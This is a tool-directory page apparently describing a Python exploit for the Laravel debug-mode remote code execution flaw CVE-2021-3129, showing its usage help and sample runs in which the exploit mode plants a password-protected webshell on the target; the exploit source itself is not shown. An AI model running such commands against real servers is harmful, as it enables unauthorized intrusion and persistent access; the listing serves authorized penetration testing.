Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-3129-exp — Laravel Debug mode RCE漏洞(CVE-2021-3129)poc / exp | Kitploit
Tools/GitHubGitHub/ajisai-babu/cve-2021-3129-exp
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubajisai-babu/cve-2021-3129-exp

CVE-2021-3129-exp

Laravel Debug mode RCE漏洞(CVE-2021-3129)poc / exp

View Repository
1313 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Laravel Debug Mode RCE Vulnerability (CVE-2021-3129) POC / EXP

CVE-2021-3129 EXP / POC

  • ⚠️ Note: Due to the fact that exploitation and detection of this vulnerability require multiple requests, the process may be slow.
  • Usage:
root@kitploit:~
python CVE-2021-3129.py
usage: python CVE-2021-3129.py -u [url] --exp

Laravel Debug mode RCE(CVE-2021-3129)POC & EXP

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     指定目标url地址
  -e, --exp             利用漏洞写入webshell,如不指定,则仅进行漏洞检测
  -p PROXY, --proxy PROXY
                        设置代理,如socks5://127.0.0.1:7890
  • Example:
root@kitploit:~
# poc
python CVE-2021-3129.py -u http://xxxxx.com 
[✅]检测到漏洞![🚩]url: http://xxxxx.com [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64

# exp
python CVE-2021-3129.py -u http://xxxxx.com --exp                     
[✅]检测到漏洞![🚩]url: http://xxxxx.com [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64 
[OK] 成功写入webshell, 访问地址 http://xxxxx.com/shell.php , 密码 whoami

# proxy
python CVE-2021-3129.py -u http://xxxxx.com/ -p socks5://127.0.0.1:7890
python CVE-2021-3129.py -u http://xxxxx.com/ --exp -p socks5://127.0.0.1:7890
  • References

    • https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g
    • https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
    • https://github.com/nth347/CVE-2021-3129_exploit
    • https://github.com/ambionics/phpggc
  • Usage Notice

    • This tool is intended only for legally authorized enterprise security assessment activities. When using this tool for detection, you must ensure that such actions comply with local laws and regulations and that you have obtained sufficient authorization.
    • If you engage in any illegal behavior while using this tool, you shall bear the corresponding consequences.
Download Tool